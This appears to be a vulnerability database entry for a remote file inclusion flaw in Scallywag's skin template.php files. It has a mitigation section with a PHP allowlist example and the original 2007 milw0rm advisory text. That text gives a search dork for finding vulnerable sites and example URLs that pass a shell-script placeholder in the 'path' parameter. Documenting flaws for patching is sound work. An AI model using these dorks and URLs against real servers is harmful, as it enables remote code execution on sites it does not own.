Vendor: Scallywag
By:
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Scallywag
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Scallywag Remote File Inclusion Vulnerability

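The Scallywag application is vulnerable to remote file inclusion. The template.php file of each skin (skin/dark, skin/gold and skin/original) builds an include() path from the `path` parameter in the URL without validating it. An attacker who supplies a remote file location in that parameter can make the server include it, which allows execution of arbitrary code on the server.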

Mitigation:

To mitigate this vulnerability, the application should validate and sanitize user input before including files. Additionally, access controls should be implemented to restrict access to sensitive files.
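
One way to implement the validation described above, as an added example that is not part of the advisory or of Scallywag's own code. It assumes the skin name is the only request-derived value and that top.txt is static markup; `SKINS` and `skin_file()` are hypothetical names, and the demo tree and inputs are constructed.

```php
<?php
// Added example, not Scallywag code. SKINS and skin_file() are hypothetical names.
// Assumes top.txt is static markup, so it is emitted with readfile(), never include().

const SKINS = ['dark', 'gold', 'original'];   // the three skins named in the advisory

/**
 * Resolve $relative inside <root>/skin/<skin>/ and return its absolute path,
 * or null when the skin is not allowlisted or the path escapes the skin dir.
 */
function skin_file(string $root, string $skin, string $relative): ?string
{
    if (!in_array($skin, SKINS, true)) {
        return null;                          // rejects URLs, "../", anything unknown
    }
    $base = realpath("$root/skin/$skin");
    $file = $base === false ? false : realpath("$base/$relative");
    if ($file === false) {
        return null;                          // missing directory or file
    }
    // Containment check after symlinks and ".." have been resolved.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Constructed demo tree so the block runs offline.
$root = sys_get_temp_dir() . '/scallywag_demo_' . getmypid();
mkdir("$root/skin/dark/source", 0700, true);
file_put_contents("$root/skin/dark/source/top.txt", "<div id=\"top\"></div>\n");
file_put_contents("$root/secret.txt", "outside the skin directory\n");

$cases = [
    ['dark', 'source/top.txt'],                      // legitimate request
    ['https://example.invalid/x', 'source/top.txt'], // remote value in the skin slot
    ['dark', '../../secret.txt'],                    // traversal out of skin/dark
    ['../..', 'secret.txt'],                         // traversal in the skin slot
];
foreach ($cases as [$skin, $rel]) {
    $file = skin_file($root, $skin, $rel);
    printf("%-28s %-20s => %s\n", $skin, $rel, $file === null ? 'rejected' : 'served');
    if ($file !== null) {
        readfile($file);                      // emits bytes, executes nothing
    }
}
```

Only the first case is served; the other three are rejected before any file is opened. Setting `allow_url_include = Off` in php.ini additionally stops `include()` from fetching URLs even if a tainted path reaches it.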
Source

Exploit-DB raw data:

##############################################################################################
#Scallywag  <=  Remote File Inclusion Vulnerability                                          #
#                                                                                            # 
#Dork:"Powered by Scallywag"                                                                 #
#                                                                                            #
#                                                                                            # 
##############################################################################################
#Vuln Code                                                                                   #  
#                                                                                            # 
#ERROR1:skin/dark/template.php                                                               # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              # 
#                                                                                            # 
#                                                                                            # 
#BUG1:                                                                                       # 
#                                                                                            # 
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]]                #
############################################################################################## 
#                                                                                            # 
#ERROR2:skin/gold/template.php                                                               # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              # 
#                                                                                            # 
#                                                                                            # 
#BUG2:                                                                                       # 
#                                                                                            # 
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]]                #
##############################################################################################
#                                                                                            # 
#ERROR3:skin/original/template.php                                                           # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              #
#                                                                                            # 
#                                                                                            # 
#BUG3:                                                                                       # 
#                                                                                            # 
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]]           #
##############################################################################################
#                                                                                            # 
#Script Download                                                                             # 
##############################################################################################
#                                                                                            # 
#http://www.woweb.ru/load/82-1-0-3791                                                        # 
#                                                                                            # 
############################################################################################## 
#                                                                                            # 
#Cyber-Security                                                                              # 
#                                                                                            # 
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-23]